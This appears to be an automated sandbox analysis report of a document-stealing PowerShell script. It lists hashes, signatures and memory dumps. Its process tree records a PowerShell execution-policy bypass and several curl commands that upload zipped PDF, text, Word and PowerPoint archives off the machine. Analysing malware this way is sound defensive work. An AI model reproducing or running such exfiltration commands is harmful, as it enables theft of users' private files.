Analysis

  • max time kernel
    146s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/10/2023, 11:41

General

  • Target

    Steal_Doc-v1.ps1

  • Size

    1KB

  • MD5

    1533265f58b0e4cf527ded9e1b06920a

  • SHA1

    aa9123b7c8437cc67e745b8dd579d30c62ad5b86

  • SHA256

    f7ddaca98fc31549da88eb647b5905a895163dd426a06a4dc672ab829c74d225

  • SHA512

    fdc6886188f418fa8eb08a37a7c126d690fa6ea043ee964c5c2c6f6ca8716e30d8457c4260ca6f1794c714c5db4128e295e9aee5d01032c503015bad798b4be4

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\Steal_Doc-v1.ps1
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4512
    • C:\Windows\system32\curl.exe
      "C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\PDF.zip
      2⤵
        PID:368
      • C:\Windows\system32\curl.exe
        "C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\Text.zip
        2⤵
          PID:1872
        • C:\Windows\system32\curl.exe
          "C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\Word.zip
          2⤵
            PID:1572
          • C:\Windows\system32\curl.exe
            "C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\PowerPoint.zip
            2⤵
              PID:4560
            • C:\Windows\system32\curl.exe
              "C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\Word.zip
              2⤵
                PID:3164

            Network

                  MITRE ATT&CK Matrix

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3knk1ija.t2y.ps1

                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • memory/4512-5-0x00000205C0980000-0x00000205C09A2000-memory.dmp

                    Filesize

                    136KB

                  • memory/4512-10-0x00007FFB3C4F0000-0x00007FFB3CFB1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4512-11-0x00000205C0800000-0x00000205C0810000-memory.dmp

                    Filesize

                    64KB

                  • memory/4512-12-0x00000205C0800000-0x00000205C0810000-memory.dmp

                    Filesize

                    64KB

                  • memory/4512-13-0x00000205C0800000-0x00000205C0810000-memory.dmp

                    Filesize

                    64KB

                  • memory/4512-14-0x00000205C0D30000-0x00000205C0D42000-memory.dmp

                    Filesize

                    72KB

                  • memory/4512-15-0x00000205C0D10000-0x00000205C0D1A000-memory.dmp

                    Filesize

                    40KB

                  • memory/4512-17-0x00000205C1130000-0x00000205C12F2000-memory.dmp

                    Filesize

                    1.8MB

                  • memory/4512-18-0x00000205C1830000-0x00000205C1D58000-memory.dmp

                    Filesize

                    5.2MB

                  • memory/4512-19-0x00000205C0800000-0x00000205C0810000-memory.dmp

                    Filesize

                    64KB

                  • memory/4512-25-0x00007FFB3C4F0000-0x00007FFB3CFB1000-memory.dmp

                    Filesize

                    10.8MB